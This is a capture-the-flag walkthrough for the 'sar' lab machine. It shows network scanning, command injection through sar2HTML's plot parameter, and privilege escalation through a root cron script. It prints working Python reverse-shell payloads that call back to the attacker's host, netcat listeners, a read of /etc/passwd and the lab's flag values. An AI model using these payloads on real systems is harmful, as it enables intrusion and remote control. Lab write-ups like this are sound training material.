Take down “sar” machine

Overview:

Target Machine IP Address: 192.168.56.107  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

 

Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.

DHCP : ENABLED
IP : AUTO ASSIGN

Download:

You can download the machine from here.

************************************

To capture the target IP address:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24
__$ sudo arp-scan --interface=vboxnet0 192.168.56.1/24 
[sudo] password for researcher: 
Interface: vboxnet0, type: EN10MB, MAC: 0a:00:27:00:00:00, IPv4: 192.168.56.1
WARNING: host part of 192.168.56.1/24 is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.100 08:00:27:72:a6:c8 PCS Systemtechnik GmbH
192.168.56.107 08:00:27:e7:60:30 PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.030 seconds (126.11 hosts/sec). 2 responded

Target IP:  192.168.56.107

__$ nmap -sC -sV -p- -Pn 192.168.56.107 -o nmap.log 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 23:23 IST
Nmap scan report for 192.168.56.107
Host is up (0.0024s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.80 seconds

Browse: http://192.168.56.107/robots.txt

 


In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

http://192.168.56.107/sar2HTML/index.php?plot=;cat%20/etc/passwd

Since we can execute code, we will try to get a reverse connection…

On Browser:

http://192.168.56.107/sar2HTML/index.php?plot=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.1%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

On Kali Linux Machine:

nc -lvp 1234

cd /home/love/Desktop;cat user.txt

user flag:  427a7e47deb4a8649c7cab38df232b52

python3 -c "import pty;pty.spawn('/bin/bash')";
export TERM=xterm

It is a religious stuff that I upload linpeas.sh to /tmp folder of victim machine, through which I will come to know about the privilege escalation and get the root access and root flag.

Our of so many information we got, /var/spool/cron/crontab looks very promising. let’s check the crontab entry …

1. crontab -l   #no entry 
2. cat /etc/crontab

*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
cd /var/www/html 
ls -lah
cat write.sh
#!/bin/sh
touch /tmp/gateway   #we need to add a reverse shell here
Python Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Subsequently, we shall wait a reverse connection on Kali Linux with port 9000

On Kali Linux:

nc -lvp 9000

root flag: 66f93d6b2ca96c9ad78a8a9ba0008e99

 

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Menu